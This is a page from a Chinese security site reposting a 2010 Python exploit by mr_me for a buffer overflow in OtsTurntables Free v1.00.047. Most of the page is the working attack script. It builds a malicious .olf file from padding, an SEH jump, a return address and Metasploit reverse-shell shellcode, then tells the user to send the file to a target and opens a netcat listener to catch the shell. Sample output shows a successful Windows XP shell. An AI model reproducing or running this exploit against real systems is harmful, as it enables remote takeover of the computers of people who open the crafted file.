首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
OtsTurntables Free v1.00.047 (.olf) Universal Buffer Overflow Exploit
来源:vfocus.net 作者:mr_me 发布时间:2010-02-22  

#!/usr/bin/python
#
# ###################################################################
#
# OtsTurntables Free v1.00.047 (.olf) Universal Buffer Overflow Exploit
# Date: 14-01-2010
# Author: mr_me
# Software Link: http://www.otsturntables.com/download-otsturntables-free/
# Version: 1.00.047
# Tested on:  Windows XP sp3
# Greetz: corelanc0d3r/jacky/eske/sinn3r/EdiStrosar/Rick2600/MarkoT/jnz
# bad chars: '\x00\x0a\xbd\x0d\x20'
#
#   ** For educational purposes only **
#
# ####################################################################
#
#  ~! I want to go back to the matrix !~
#
# mrme@backtrack:~$ ./0wnm3.py 4444 awsome-electro.olf
#
# [+] OtsTurntables Free v1.00.047 (olf file) BOF Exploit
# [+] Creating exploit file..
# [+] Writing 15000 bytes to awsome-electro.olf.. ph33r
# [+] Send awsome-electro.olf to your target
# [+] Waiting for a shell on port: 4444
# listening on [any] 4444 ...
# 192.168.2.19: inverse host lookup failed: Unknown server error : Connection timed out
# connect to [192.168.2.10] from (UNKNOWN) [192.168.2.19] 2624
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\OtsLabs\Lists>
#

import sys, os

def banner():
 print "|------------------------------------------------------------------|"
 print "|                         __               __                      |"
 print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |"
 print "|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |"
 print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |"
 print "| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |"
 print "|                                                                  |" 
 print "|-------------------------------------------------[ EIP Hunters ]--|"
 print "[+] OtsTurntables Free v1.00.047 (olf file) BOF Exploit"

if len(sys.argv) < 3:
 banner()
 print "[?] Usage: " + sys.argv[0] + " <port> <filename>"
 sys.exit(1)

port = sys.argv[1]
filename = sys.argv[2]

# windows/shell_reverse_tcp - 310 bytes
# http://www.metasploit.com
# Encoder: x86/fnstenv_mov
# LHOST=192.168.2.10, EXITFUNC=seh, LPORT=4444
 
shell = ("\x6a\x48\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x47\x4b"
"\x25\x9a\x83\xeb\xfc\xe2\xf4\xbb\x21\xce\xd7\xaf\xb2\xda\x65"
"\xb8\x2b\xae\xf6\x63\x6f\xae\xdf\x7b\xc0\x59\x9f\x3f\x4a\xca"
"\x11\x08\x53\xae\xc5\x67\x4a\xce\xd3\xcc\x7f\xae\x9b\xa9\x7a"
"\xe5\x03\xeb\xcf\xe5\xee\x40\x8a\xef\x97\x46\x89\xce\x6e\x7c"
"\x1f\x01\xb2\x32\xae\xae\xc5\x63\x4a\xce\xfc\xcc\x47\x6e\x11"
"\x18\x57\x24\x71\x44\x67\xae\x13\x2b\x6f\x39\xfb\x84\x7a\xfe"
"\xfe\xcc\x08\x15\x11\x07\x47\xae\xea\x5b\xe6\xae\xda\x4f\x15"
"\x4d\x14\x09\x45\xc9\xca\xb8\x9d\x43\xc9\x21\x23\x16\xa8\x2f"
"\x3c\x56\xa8\x18\x1f\xda\x4a\x2f\x80\xc8\x66\x7c\x1b\xda\x4c"
"\x18\xc2\xc0\xfc\xc6\xa6\x2d\x98\x12\x21\x27\x65\x97\x23\xfc"
"\x93\xb2\xe6\x72\x65\x91\x18\x76\xc9\x14\x08\x76\xd9\x14\xb4"
"\xf5\xf2\x87\xe3\x27\x90\x21\x23\x34\xc6\x21\x18\xac\x7b\xd2"
"\x23\xc9\x63\xed\x2b\x72\x65\x91\x21\x35\xcb\x12\xb4\xf5\xfc"
"\x2d\x2f\x43\xf2\x24\x26\x4f\xca\x1e\x62\xe9\x13\xa0\x21\x61"
"\x13\xa5\x7a\xe5\x69\xed\xde\xac\x67\xb9\x09\x08\x64\x05\x67"
"\xa8\xe0\x7f\xe0\x8e\x31\x2f\x39\xdb\x29\x51\xb4\x50\xb2\xb8"
"\x9d\x7e\xcd\x15\x1a\x74\xcb\x2d\x4a\x74\xcb\x12\x1a\xda\x4a"
"\x2f\xe6\xfc\x9f\x89\x18\xda\x4c\x2d\xb4\xda\xad\xb8\x9b\x4d"
"\x7d\x3e\x8d\x5c\x65\x32\x4f\xda\x4c\xb8\x3c\xd9\x65\x97\x23"
"\xd5\x10\x43\x14\x76\x65\x91\xb4\xf5\x9a");

exploit = "\x41" * 900
exploit += "\xeb\x06\x90\x90"
exploit += "\x46\x79\x23\x01" # CALL DWORD PTR SS:[ESP+2c]
exploit += "\x90" * 30
exploit += shell
exploit += "\x41" * (15000-len(exploit))

banner()
try:
 print "[+] Creating exploit file.."
 print "[+] Writing",len(exploit),"bytes to " + filename + ".. ph33r"
 print "[+] Send " + filename + " to your target"
 turntable = open(filename,'w');
 turntable.write(exploit);
 turntable.close();
 print "[+] Waiting for a shell on port: " + port
 os.system('nc -lvp ' + port)
except:
 print "[-] Error: You do not have correct permissions.."


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Apple Iphone/Ipod - FTP On The
·iTunes 9.0.1 .pls file handlin
·Easy~Ftp Server v1.7.0.2 Post-
·Rising Online Virus Scanner v2
·Easy~Ftp Server v1.7.0.2 Post-
·gitWeb v1.5.2 Remote Command E
·Easy~Ftp Server v1.7.0.2 Post-
·FileApp v1.7 for iPhone/iPod R
·Apple Iphone/Ipod - My DBLite
·Easy~Ftp Server v1.7.0.2 (HTTP
·Ollydbg 2.00 Beta1 Local Buffe
·Coppermine Photo Gallery <= 1.
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved